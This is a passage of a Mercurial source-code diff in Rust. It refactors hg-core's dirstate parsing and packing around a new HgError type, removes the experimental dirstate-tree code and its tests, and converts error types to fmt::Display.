- assert_eq!(tree.remove(HgPath::new(b"foo")), None);
- assert_eq!(tree.files_count, 0);
-
- let entry = DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None);
- assert_eq!(tree.files_count, 1);
-
- assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry));
- assert_eq!(tree.files_count, 0);
-
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/y"), entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/z"), entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"x"), entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"y"), entry), None);
- assert_eq!(tree.files_count, 5);
-
- assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry));
- assert_eq!(tree.files_count, 4);
- assert_eq!(tree.remove(HgPath::new(b"a/b/x")), None);
- assert_eq!(tree.files_count, 4);
- assert_eq!(tree.remove(HgPath::new(b"a/b/y")), Some(entry));
- assert_eq!(tree.files_count, 3);
- assert_eq!(tree.remove(HgPath::new(b"a/b/z")), Some(entry));
- assert_eq!(tree.files_count, 2);
-
- assert_eq!(tree.remove(HgPath::new(b"x")), Some(entry));
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.remove(HgPath::new(b"y")), Some(entry));
- assert_eq!(tree.files_count, 0);
-
- // `a` should have been cleaned up, no more files anywhere in its
- // descendents
- assert_eq!(tree.get_node(HgPath::new(b"a")), None);
- assert_eq!(tree.root.children().unwrap().len(), 0);
-
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- ..entry
- };
- assert_eq!(tree.insert(HgPath::new(b"a"), removed_entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None);
- assert_eq!(tree.files_count, 2);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a")), Some(removed_entry));
- assert_eq!(tree.files_count, 1);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry));
- assert_eq!(tree.files_count, 0);
-
- // The entire tree should have been cleaned up, no more files anywhere
- // in its descendents
- assert_eq!(tree.root.children().unwrap().len(), 0);
-
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- ..entry
- };
- assert_eq!(tree.insert(HgPath::new(b"a"), entry), None);
- assert_eq!(
- tree.insert_node(HgPath::new(b"a/b/x"), removed_entry),
- None
- );
- assert_eq!(tree.files_count, 2);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a")), Some(entry));
- assert_eq!(tree.files_count, 1);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(removed_entry));
- assert_eq!(tree.files_count, 0);
-
- dbg!(&tree);
- // The entire tree should have been cleaned up, no more files anywhere
- // in its descendents
- assert_eq!(tree.root.children().unwrap().len(), 0);
-
- assert_eq!(tree.insert(HgPath::new(b"d"), entry), None);
- assert_eq!(tree.insert(HgPath::new(b"d/d/d"), entry), None);
- assert_eq!(tree.files_count, 2);
-
- // Deleting the nested file should not delete the top directory as it
- // used to be a file
- assert_eq!(tree.remove(HgPath::new(b"d/d/d")), Some(entry));
- assert_eq!(tree.files_count, 1);
- assert!(tree.get_node(HgPath::new(b"d")).is_some());
- assert!(tree.remove(HgPath::new(b"d")).is_some());
- assert_eq!(tree.files_count, 0);
-
- // Deleting the nested file should not delete the top file (other way
- // around from the last case)
- assert_eq!(tree.insert(HgPath::new(b"a/a"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.insert(HgPath::new(b"a"), entry), None);
- assert_eq!(tree.files_count, 2);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a/a")), Some(entry));
- assert_eq!(tree.files_count, 1);
- dbg!(&tree);
- assert!(tree.get_node(HgPath::new(b"a")).is_some());
- assert!(tree.get_node(HgPath::new(b"a/a")).is_none());
- }
-
- #[test]
- fn test_was_directory() {
- let mut tree = Tree::new();
-
- let entry = DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 0,
- size: 0,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None);
- assert_eq!(tree.files_count, 1);
-
- assert!(tree.insert_node(HgPath::new(b"a"), entry).is_some());
- let new_a = tree.root.children().unwrap().get(&b"a".to_vec()).unwrap();
-
- match &new_a.kind {
- NodeKind::Directory(_) => panic!(),
- NodeKind::File(f) => {
- let dir = f.was_directory.clone().unwrap();
- let c = dir
- .children
- .get(&b"b".to_vec())
- .unwrap()
- .children()
- .unwrap()
- .get(&b"c".to_vec())
- .unwrap();
-
- assert_eq!(
- match &c.kind {
- NodeKind::Directory(_) => panic!(),
- NodeKind::File(f) => f.entry,
- },
- entry
- );
- }
- }
- assert_eq!(tree.files_count, 2);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry));
- assert_eq!(tree.files_count, 1);
- dbg!(&tree);
- let a = tree.get_node(HgPath::new(b"a")).unwrap();
- match &a.kind {
- NodeKind::Directory(_) => panic!(),
- NodeKind::File(f) => {
- // Directory in `was_directory` was emptied, should be removed
- assert_eq!(f.was_directory, None);
- }
- }
- }
- #[test]
- fn test_extend() {
- let insertions = [
- (
- HgPathBuf::from_bytes(b"d"),
- DirstateEntry {
- state: EntryState::Added,
- mode: 0,
- mtime: -1,
- size: -1,
- },
- ),
- (
- HgPathBuf::from_bytes(b"b"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 33188,
- mtime: 1599647984,
- size: 2,
- },
- ),
- (
- HgPathBuf::from_bytes(b"a/a"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 33188,
- mtime: 1599647984,
- size: 2,
- },
- ),
- (
- HgPathBuf::from_bytes(b"d/d/d"),
- DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 0,
- size: 0,
- },
- ),
- ]
- .to_vec();
- let mut tree = Tree::new();
-
- tree.extend(insertions.clone().into_iter());
-
- for (path, _) in &insertions {
- assert!(tree.contains_key(path), true);
- }
- assert_eq!(tree.files_count, 4);
- }
-}
--- a/rust/hg-core/src/dirstate/parsers.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate/parsers.rs Tue Apr 20 11:01:06 2021 -0400
@@ -3,15 +3,16 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
+use crate::errors::HgError;
use crate::utils::hg_path::HgPath;
use crate::{
- dirstate::{CopyMap, EntryState, StateMap},
- DirstateEntry, DirstatePackError, DirstateParents, DirstateParseError,
+ dirstate::{CopyMap, EntryState, RawEntry, StateMap},
+ DirstateEntry, DirstateParents,
};
-use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt};
+use byteorder::{BigEndian, WriteBytesExt};
+use bytes_cast::BytesCast;
use micro_timer::timed;
use std::convert::{TryFrom, TryInto};
-use std::io::Cursor;
use std::time::Duration;
/// Parents are stored in the dirstate as byte hashes.
@@ -20,77 +21,64 @@
const MIN_ENTRY_SIZE: usize = 17;
type ParseResult<'a> = (
- DirstateParents,
+ &'a DirstateParents,
Vec<(&'a HgPath, DirstateEntry)>,
Vec<(&'a HgPath, &'a HgPath)>,
);
-#[timed]
-pub fn parse_dirstate(
+pub fn parse_dirstate_parents(
contents: &[u8],
-) -> Result<ParseResult, DirstateParseError> {
- if contents.len() < PARENT_SIZE * 2 {
- return Err(DirstateParseError::TooLittleData);
- }
- let mut copies = vec![];
- let mut entries = vec![];
+) -> Result<&DirstateParents, HgError> {
+ let (parents, _rest) = DirstateParents::from_bytes(contents)
+ .map_err(|_| HgError::corrupted("Too little data for dirstate."))?;
+ Ok(parents)
+}
- let mut curr_pos = PARENT_SIZE * 2;
- let parents = DirstateParents {
- p1: contents[..PARENT_SIZE].try_into().unwrap(),
- p2: contents[PARENT_SIZE..curr_pos].try_into().unwrap(),
- };
+#[timed]
+pub fn parse_dirstate(mut contents: &[u8]) -> Result<ParseResult, HgError> {
+ let mut copies = Vec::new();
+ let mut entries = Vec::new();
- while curr_pos < contents.len() {
- if curr_pos + MIN_ENTRY_SIZE > contents.len() {
- return Err(DirstateParseError::Overflow);
- }
- let entry_bytes = &contents[curr_pos..];
+ let (parents, rest) = DirstateParents::from_bytes(contents)
+ .map_err(|_| HgError::corrupted("Too little data for dirstate."))?;
+ contents = rest;
+ while !contents.is_empty() {
+ let (raw_entry, rest) = RawEntry::from_bytes(contents)
+ .map_err(|_| HgError::corrupted("Overflow in dirstate."))?;
- let mut cursor = Cursor::new(entry_bytes);
- let state = EntryState::try_from(cursor.read_u8()?)?;
- let mode = cursor.read_i32::<BigEndian>()?;
- let size = cursor.read_i32::<BigEndian>()?;
- let mtime = cursor.read_i32::<BigEndian>()?;
- let path_len = cursor.read_i32::<BigEndian>()? as usize;
+ let entry = DirstateEntry {
+ state: EntryState::try_from(raw_entry.state)?,
+ mode: raw_entry.mode.get(),
+ mtime: raw_entry.mtime.get(),
+ size: raw_entry.size.get(),
+ };
+ let (paths, rest) =
+ u8::slice_from_bytes(rest, raw_entry.length.get() as usize)
+ .map_err(|_| HgError::corrupted("Overflow in dirstate."))?;
- if path_len > contents.len() - curr_pos {
- return Err(DirstateParseError::Overflow);
+ // `paths` is either a single path, or two paths separated by a NULL
+ // byte
+ let mut iter = paths.splitn(2, |&byte| byte == b'\0');
+ let path = HgPath::new(
+ iter.next().expect("splitn always yields at least one item"),
+ );
+ if let Some(copy_source) = iter.next() {
+ copies.push((path, HgPath::new(copy_source)));
}
- // Slice instead of allocating a Vec needed for `read_exact`
- let path = &entry_bytes[MIN_ENTRY_SIZE..MIN_ENTRY_SIZE + (path_len)];
-
- let (path, copy) = match memchr::memchr(0, path) {
- None => (path, None),
- Some(i) => (&path[..i], Some(&path[(i + 1)..])),
- };
-
- if let Some(copy_path) = copy {
- copies.push((HgPath::new(path), HgPath::new(copy_path)));
- };
- entries.push((
- HgPath::new(path),
- DirstateEntry {
- state,
- mode,
- size,
- mtime,
- },
- ));
- curr_pos = curr_pos + MIN_ENTRY_SIZE + (path_len);
+ entries.push((path, entry));
+ contents = rest;
}
Ok((parents, entries, copies))
}
/// `now` is the duration in seconds since the Unix epoch
-#[cfg(not(feature = "dirstate-tree"))]
pub fn pack_dirstate(
state_map: &mut StateMap,
copy_map: &CopyMap,
parents: DirstateParents,
now: Duration,
-) -> Result<Vec<u8>, DirstatePackError> {
+) -> Result<Vec<u8>, HgError> {
// TODO move away from i32 before 2038.
let now: i32 = now.as_secs().try_into().expect("time overflow");
@@ -108,8 +96,8 @@
let mut packed = Vec::with_capacity(expected_size);
- packed.extend(&parents.p1);
- packed.extend(&parents.p2);
+ packed.extend(parents.p1.as_bytes());
+ packed.extend(parents.p2.as_bytes());
for (filename, entry) in state_map.iter_mut() {
let new_filename = filename.to_owned();
@@ -136,93 +124,27 @@
new_filename.extend(copy.bytes());
}
- packed.write_u8(entry.state.into())?;
- packed.write_i32::<BigEndian>(entry.mode)?;
- packed.write_i32::<BigEndian>(entry.size)?;
- packed.write_i32::<BigEndian>(new_mtime)?;
- packed.write_i32::<BigEndian>(new_filename.len() as i32)?;
+ // Unwrapping because `impl std::io::Write for Vec<u8>` never errors
+ packed.write_u8(entry.state.into()).unwrap();
+ packed.write_i32::<BigEndian>(entry.mode).unwrap();
+ packed.write_i32::<BigEndian>(entry.size).unwrap();
+ packed.write_i32::<BigEndian>(new_mtime).unwrap();
+ packed
+ .write_i32::<BigEndian>(new_filename.len() as i32)
+ .unwrap();
packed.extend(new_filename)
}
if packed.len() != expected_size {
- return Err(DirstatePackError::BadSize(expected_size, packed.len()));
+ return Err(HgError::CorruptedRepository(format!(
+ "bad dirstate size: {} != {}",
+ expected_size,
+ packed.len()
+ )));
}
Ok(packed)
}
-/// `now` is the duration in seconds since the Unix epoch
-#[cfg(feature = "dirstate-tree")]
-pub fn pack_dirstate(
- state_map: &mut StateMap,
- copy_map: &CopyMap,
- parents: DirstateParents,
- now: Duration,
-) -> Result<Vec<u8>, DirstatePackError> {
- // TODO move away from i32 before 2038.
- let now: i32 = now.as_secs().try_into().expect("time overflow");
-
- let expected_size: usize = state_map
- .iter()
- .map(|(filename, _)| {
- let mut length = MIN_ENTRY_SIZE + filename.len();
- if let Some(copy) = copy_map.get(&filename) {
- length += copy.len() + 1;
- }
- length
- })
- .sum();
- let expected_size = expected_size + PARENT_SIZE * 2;
-
- let mut packed = Vec::with_capacity(expected_size);
- let mut new_state_map = vec![];
-
- packed.extend(&parents.p1);
- packed.extend(&parents.p2);
-
- for (filename, entry) in state_map.iter() {
- let new_filename = filename.to_owned();
- let mut new_mtime: i32 = entry.mtime;
- if entry.state == EntryState::Normal && entry.mtime == now {
- // The file was last modified "simultaneously" with the current
- // write to dirstate (i.e. within the same second for file-
- // systems with a granularity of 1 sec). This commonly happens
- // for at least a couple of files on 'update'.
- // The user could change the file without changing its size
- // within the same second. Invalidate the file's mtime in
- // dirstate, forcing future 'status' calls to compare the
- // contents of the file if the size is the same. This prevents
- // mistakenly treating such files as clean.
- new_mtime = -1;
- new_state_map.push((
- filename.to_owned(),
- DirstateEntry {
- mtime: new_mtime,
- ..entry
- },
- ));
- }
- let mut new_filename = new_filename.into_vec();
- if let Some(copy) = copy_map.get(&filename) {
- new_filename.push(b'\0');
- new_filename.extend(copy.bytes());
- }
-
- packed.write_u8(entry.state.into())?;
- packed.write_i32::<BigEndian>(entry.mode)?;
- packed.write_i32::<BigEndian>(entry.size)?;
- packed.write_i32::<BigEndian>(new_mtime)?;
- packed.write_i32::<BigEndian>(new_filename.len() as i32)?;
- packed.extend(new_filename)
- }
-
- if packed.len() != expected_size {
- return Err(DirstatePackError::BadSize(expected_size, packed.len()));
- }
-
- state_map.extend(new_state_map);
-
- Ok(packed)
-}
#[cfg(test)]
mod tests {
@@ -235,8 +157,8 @@
let mut state_map = StateMap::default();
let copymap = FastHashMap::default();
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let expected = b"1234567891011121314100000000000000000000".to_vec();
@@ -266,8 +188,8 @@
let copymap = FastHashMap::default();
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let expected = [
@@ -306,8 +228,8 @@
HgPathBuf::from_bytes(b"copyname"),
);
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let expected = [
@@ -346,8 +268,8 @@
HgPathBuf::from_bytes(b"copyname"),
);
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let result =
@@ -366,7 +288,7 @@
.collect();
assert_eq!(
- (parents, state_map, copymap),
+ (&parents, state_map, copymap),
(new_parents, new_state_map, new_copy_map)
)
}
@@ -424,8 +346,8 @@
HgPathBuf::from_bytes(b"copyname2"),
);
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let result =
@@ -444,7 +366,7 @@
.collect();
assert_eq!(
- (parents, state_map, copymap),
+ (&parents, state_map, copymap),
(new_parents, new_state_map, new_copy_map)
)
}
@@ -470,8 +392,8 @@
HgPathBuf::from_bytes(b"copyname"),
);
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let result =
@@ -491,7 +413,7 @@
assert_eq!(
(
- parents,
+ &parents,
[(
HgPathBuf::from_bytes(b"f1"),
DirstateEntry {
--- a/rust/hg-core/src/dirstate/status.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate/status.rs Tue Apr 20 11:01:06 2021 -0400
@@ -9,9 +9,6 @@
//! It is currently missing a lot of functionality compared to the Python one
//! and will only be triggered in narrow cases.
-#[cfg(feature = "dirstate-tree")]
-use crate::dirstate::dirstate_tree::iter::StatusShortcut;
-#[cfg(not(feature = "dirstate-tree"))]
use crate::utils::path_auditor::PathAuditor;
use crate::{
dirstate::SIZE_FROM_OTHER_PARENT,
@@ -33,6 +30,7 @@
use std::{
borrow::Cow,
collections::HashSet,
+ fmt,
fs::{read_dir, DirEntry},
io::ErrorKind,
ops::Deref,
@@ -51,17 +49,16 @@
Unknown,
}
-impl ToString for BadType {
- fn to_string(&self) -> String {
- match self {
+impl fmt::Display for BadType {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ f.write_str(match self {
BadType::CharacterDevice => "character device",
BadType::BlockDevice => "block device",
BadType::FIFO => "fifo",
BadType::Socket => "socket",
BadType::Directory => "directory",
BadType::Unknown => "unknown",
- }
- .to_string()
+ })
}
}
@@ -184,7 +181,13 @@
|| other_parent
|| copy_map.contains_key(filename.as_ref())
{
- Dispatch::Modified
+ if metadata.is_symlink() && size_changed {
+ // issue6456: Size returned may be longer due to encryption
+ // on EXT-4 fscrypt. TODO maybe only do it on EXT4?
+ Dispatch::Unsure
+ } else {
+ Dispatch::Modified
+ }
} else if mod_compare(mtime, st_mtime as i32)
|| st_mtime == options.last_normal_time
{
@@ -265,7 +268,7 @@
pub traversed: Vec<HgPathBuf>,
}
-#[derive(Debug)]
+#[derive(Debug, derive_more::From)]
pub enum StatusError {
/// Generic IO error
IO(std::io::Error),
@@ -277,28 +280,12 @@
pub type StatusResult<T> = Result<T, StatusError>;
-impl From<PatternError> for StatusError {
- fn from(e: PatternError) -> Self {
- StatusError::Pattern(e)
- }
-}
-impl From<HgPathError> for StatusError {
- fn from(e: HgPathError) -> Self {
- StatusError::Path(e)
- }
-}
-impl From<std::io::Error> for StatusError {
- fn from(e: std::io::Error) -> Self {
- StatusError::IO(e)
- }
-}
-
-impl ToString for StatusError {
- fn to_string(&self) -> String {
+impl fmt::Display for StatusError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
- StatusError::IO(e) => e.to_string(),
- StatusError::Path(e) => e.to_string(),
- StatusError::Pattern(e) => e.to_string(),
+ StatusError::IO(error) => error.fmt(f),
+ StatusError::Path(error) => error.fmt(f),
+ StatusError::Pattern(error) => error.fmt(f),
}
}
}
@@ -713,83 +700,6 @@
///
/// This takes a mutable reference to the results to account for the
/// `extend` in timings
- #[cfg(feature = "dirstate-tree")]
- #[timed]
- pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) {
- results.par_extend(
- self.dmap
- .fs_iter(self.root_dir.clone())
- .par_bridge()
- .filter(|(path, _)| self.matcher.matches(path))
- .map(move |(filename, shortcut)| {
- let entry = match shortcut {
- StatusShortcut::Entry(e) => e,
- StatusShortcut::Dispatch(d) => {
- return (Cow::Owned(filename), d)
- }
- };
- let filename_as_path = match hg_path_to_path_buf(&filename)
- {
- Ok(f) => f,
- Err(_) => {
- return (
- Cow::Owned(filename),
- INVALID_PATH_DISPATCH,
- )
- }
- };
- let meta = self
- .root_dir
- .join(filename_as_path)
- .symlink_metadata();
-
- match meta {
- Ok(m)
- if !(m.file_type().is_file()
- || m.file_type().is_symlink()) =>
- {
- (
- Cow::Owned(filename),
- dispatch_missing(entry.state),
- )
- }
- Ok(m) => {
- let dispatch = dispatch_found(
- &filename,
- entry,
- HgMetadata::from_metadata(m),
- &self.dmap.copy_map,
- self.options,
- );
- (Cow::Owned(filename), dispatch)
- }
- Err(e)
- if e.kind() == ErrorKind::NotFound
- || e.raw_os_error() == Some(20) =>
- {
- // Rust does not yet have an `ErrorKind` for
- // `NotADirectory` (errno 20)
- // It happens if the dirstate contains `foo/bar`
- // and foo is not a
- // directory
- (
- Cow::Owned(filename),
- dispatch_missing(entry.state),
- )
- }
- Err(e) => {
- (Cow::Owned(filename), dispatch_os_error(&e))
- }
- }
- }),
- );
- }
-
- /// Add the files in the dirstate to the results.
- ///
- /// This takes a mutable reference to the results to account for the
- /// `extend` in timings
- #[cfg(not(feature = "dirstate-tree"))]
#[timed]
pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) {
results.par_extend(
@@ -860,7 +770,6 @@
///
/// This takes a mutable reference to the results to account for the
/// `extend` in timings
- #[cfg(not(feature = "dirstate-tree"))]
#[timed]
pub fn handle_unknowns(&self, results: &mut Vec<DispatchedPath<'a>>) {
let to_visit: Vec<(&HgPath, &DirstateEntry)> =
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/errors.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,183 @@
+use crate::config::ConfigValueParseError;
+use std::fmt;
+
+/// Common error cases that can happen in many different APIs
+#[derive(Debug, derive_more::From)]
+pub enum HgError {
+ IoError {
+ error: std::io::Error,
+ context: IoErrorContext,
+ },
+
+ /// A file under `.hg/` normally only written by Mercurial is not in the
+ /// expected format. This indicates a bug in Mercurial, filesystem
+ /// corruption, or hardware failure.
+ ///
+ /// The given string is a short explanation for users, not intended to be
+ /// machine-readable.
+ CorruptedRepository(String),
+
+ /// The respository or requested operation involves a feature not
+ /// supported by the Rust implementation. Falling back to the Python
+ /// implementation may or may not work.
+ ///
+ /// The given string is a short explanation for users, not intended to be
+ /// machine-readable.
+ UnsupportedFeature(String),
+
+ /// Operation cannot proceed for some other reason.
+ ///
+ /// The given string is a short explanation for users, not intended to be
+ /// machine-readable.
+ Abort(String),
+
+ /// A configuration value is not in the expected syntax.
+ ///
+ /// These errors can happen in many places in the code because values are
+ /// parsed lazily as the file-level parser does not know the expected type
+ /// and syntax of each value.
+ #[from]
+ ConfigValueParseError(ConfigValueParseError),
+}
+
+/// Details about where an I/O error happened
+#[derive(Debug)]
+pub enum IoErrorContext {
+ ReadingFile(std::path::PathBuf),
+ WritingFile(std::path::PathBuf),
+ RemovingFile(std::path::PathBuf),
+ RenamingFile {
+ from: std::path::PathBuf,
+ to: std::path::PathBuf,
+ },
+ /// `std::fs::canonicalize`
+ CanonicalizingPath(std::path::PathBuf),
+ /// `std::env::current_dir`
+ CurrentDir,
+ /// `std::env::current_exe`
+ CurrentExe,
+}
+
+impl HgError {
+ pub fn corrupted(explanation: impl Into<String>) -> Self {
+ // TODO: capture a backtrace here and keep it in the error value
+ // to aid debugging?
+ // https://doc.rust-lang.org/std/backtrace/struct.Backtrace.html
+ HgError::CorruptedRepository(explanation.into())
+ }
+
+ pub fn unsupported(explanation: impl Into<String>) -> Self {
+ HgError::UnsupportedFeature(explanation.into())
+ }
+ pub fn abort(explanation: impl Into<String>) -> Self {
+ HgError::Abort(explanation.into())
+ }
+}
+
+// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly?
+impl fmt::Display for HgError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ match self {
+ HgError::Abort(explanation) => write!(f, "{}", explanation),
+ HgError::IoError { error, context } => {
+ write!(f, "abort: {}: {}", context, error)
+ }
+ HgError::CorruptedRepository(explanation) => {
+ write!(f, "abort: {}", explanation)
+ }
+ HgError::UnsupportedFeature(explanation) => {
+ write!(f, "unsupported feature: {}", explanation)
+ }
+ HgError::ConfigValueParseError(error) => error.fmt(f),
+ }
+ }
+}
+
+// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly?
+impl fmt::Display for IoErrorContext {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ match self {
+ IoErrorContext::ReadingFile(path) => {
+ write!(f, "when reading {}", path.display())
+ }
+ IoErrorContext::WritingFile(path) => {
+ write!(f, "when writing {}", path.display())
+ }
+ IoErrorContext::RemovingFile(path) => {
+ write!(f, "when removing {}", path.display())
+ }
+ IoErrorContext::RenamingFile { from, to } => write!(
+ f,
+ "when renaming {} to {}",
+ from.display(),
+ to.display()
+ ),
+ IoErrorContext::CanonicalizingPath(path) => {
+ write!(f, "when canonicalizing {}", path.display())
+ }
+ IoErrorContext::CurrentDir => {
+ write!(f, "error getting current working directory")
+ }
+ IoErrorContext::CurrentExe => {
+ write!(f, "error getting current executable")
+ }
+ }
+ }
+}
+
+pub trait IoResultExt<T> {
+ /// Annotate a possible I/O error as related to a reading a file at the
+ /// given path.
+ ///
+ /// This allows printing something like “File not found when reading
+ /// example.txt” instead of just “File not found”.
+ ///
+ /// Converts a `Result` with `std::io::Error` into one with `HgError`.
+ fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError>;
+
+ fn with_context(
+ self,
+ context: impl FnOnce() -> IoErrorContext,
+ ) -> Result<T, HgError>;
+}
+
+impl<T> IoResultExt<T> for std::io::Result<T> {
+ fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError> {
+ self.with_context(|| IoErrorContext::ReadingFile(path.to_owned()))
+ }
+
+ fn with_context(
+ self,
+ context: impl FnOnce() -> IoErrorContext,
+ ) -> Result<T, HgError> {
+ self.map_err(|error| HgError::IoError {
+ error,
+ context: context(),
+ })
+ }
+}
+
+pub trait HgResultExt<T> {
+ /// Handle missing files separately from other I/O error cases.
+ ///
+ /// Wraps the `Ok` type in an `Option`:
+ ///
+ /// * `Ok(x)` becomes `Ok(Some(x))`
+ /// * An I/O "not found" error becomes `Ok(None)`
+ /// * Other errors are unchanged
+ fn io_not_found_as_none(self) -> Result<Option<T>, HgError>;
+}
+
+impl<T> HgResultExt<T> for Result<T, HgError> {
+ fn io_not_found_as_none(self) -> Result<Option<T>, HgError> {
+ match self {
+ Ok(x) => Ok(Some(x)),
+ Err(HgError::IoError { error, .. })
+ if error.kind() == std::io::ErrorKind::NotFound =>
+ {
+ Ok(None)
+ }
+ Err(other_error) => Err(other_error),
+ }
+ }
+}
--- a/rust/hg-core/src/lib.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/lib.rs Tue Apr 20 11:01:06 2021 -0400
@@ -3,8 +3,10 @@
//
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
+
mod ancestors;
pub mod dagops;
+pub mod errors;
pub use ancestors::{AncestorsIterator, LazyAncestors, MissingAncestors};
mod dirstate;
pub mod discovery;
@@ -15,7 +17,8 @@
dirstate_map::DirstateMap,
parsers::{pack_dirstate, parse_dirstate, PARENT_SIZE},
status::{
- status, BadMatch, BadType, DirstateStatus, StatusError, StatusOptions,
+ status, BadMatch, BadType, DirstateStatus, HgPathCow, StatusError,
+ StatusOptions,
},
CopyMap, CopyMapIter, DirstateEntry, DirstateParents, EntryState,
StateMap, StateMapIter,
@@ -27,23 +30,18 @@
pub mod revlog;
pub use revlog::*;
pub mod config;
+pub mod logging;
pub mod operations;
+pub mod revset;
pub mod utils;
-// Remove this to see (potential) non-artificial compile failures. MacOS
-// *should* compile, but fail to compile tests for example as of 2020-03-06
-#[cfg(not(target_os = "linux"))]
-compile_error!(
- "`hg-core` has only been tested on Linux and will most \
- likely not behave correctly on other platforms."
-);
-
use crate::utils::hg_path::{HgPathBuf, HgPathError};
pub use filepatterns::{
parse_pattern_syntax, read_pattern_file, IgnorePattern,
PatternFileWarning, PatternSyntax,
};
use std::collections::HashMap;
+use std::fmt;
use twox_hash::RandomXxHashBuilder64;
/// This is a contract between the `micro-timer` crate and us, to expose
@@ -57,45 +55,6 @@
/// write access to your repository, you have other issues.
pub type FastHashMap<K, V> = HashMap<K, V, RandomXxHashBuilder64>;
-#[derive(Clone, Debug, PartialEq)]
-pub enum DirstateParseError {
- TooLittleData,
- Overflow,
- // TODO refactor to use bytes instead of String
- CorruptedEntry(String),
- Damaged,
-}
-
-impl From<std::io::Error> for DirstateParseError {
- fn from(e: std::io::Error) -> Self {
- DirstateParseError::CorruptedEntry(e.to_string())
- }
-}
-
-impl ToString for DirstateParseError {
- fn to_string(&self) -> String {
- use crate::DirstateParseError::*;
- match self {
- TooLittleData => "Too little data for dirstate.".to_string(),
- Overflow => "Overflow in dirstate.".to_string(),
- CorruptedEntry(e) => format!("Corrupted entry: {:?}.", e),
- Damaged => "Dirstate appears to be damaged.".to_string(),
- }
- }
-}
-
-#[derive(Debug, PartialEq)]
-pub enum DirstatePackError {
- CorruptedEntry(String),
- CorruptedParent,
- BadSize(usize, usize),
-}
-
-impl From<std::io::Error> for DirstatePackError {
- fn from(e: std::io::Error) -> Self {
- DirstatePackError::CorruptedEntry(e.to_string())
- }
-}
#[derive(Debug, PartialEq)]
pub enum DirstateMapError {
PathNotFound(HgPathBuf),
@@ -103,94 +62,61 @@
InvalidPath(HgPathError),
}
-impl ToString for DirstateMapError {
- fn to_string(&self) -> String {
+impl fmt::Display for DirstateMapError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
DirstateMapError::PathNotFound(_) => {
- "expected a value, found none".to_string()
+ f.write_str("expected a value, found none")
}
- DirstateMapError::EmptyPath => "Overflow in dirstate.".to_string(),
- DirstateMapError::InvalidPath(e) => e.to_string(),
+ DirstateMapError::EmptyPath => {
+ f.write_str("Overflow in dirstate.")
+ }
+ DirstateMapError::InvalidPath(path_error) => path_error.fmt(f),
}
}
}
-#[derive(Debug)]
+#[derive(Debug, derive_more::From)]
pub enum DirstateError {
- Parse(DirstateParseError),
- Pack(DirstatePackError),
Map(DirstateMapError),
- IO(std::io::Error),
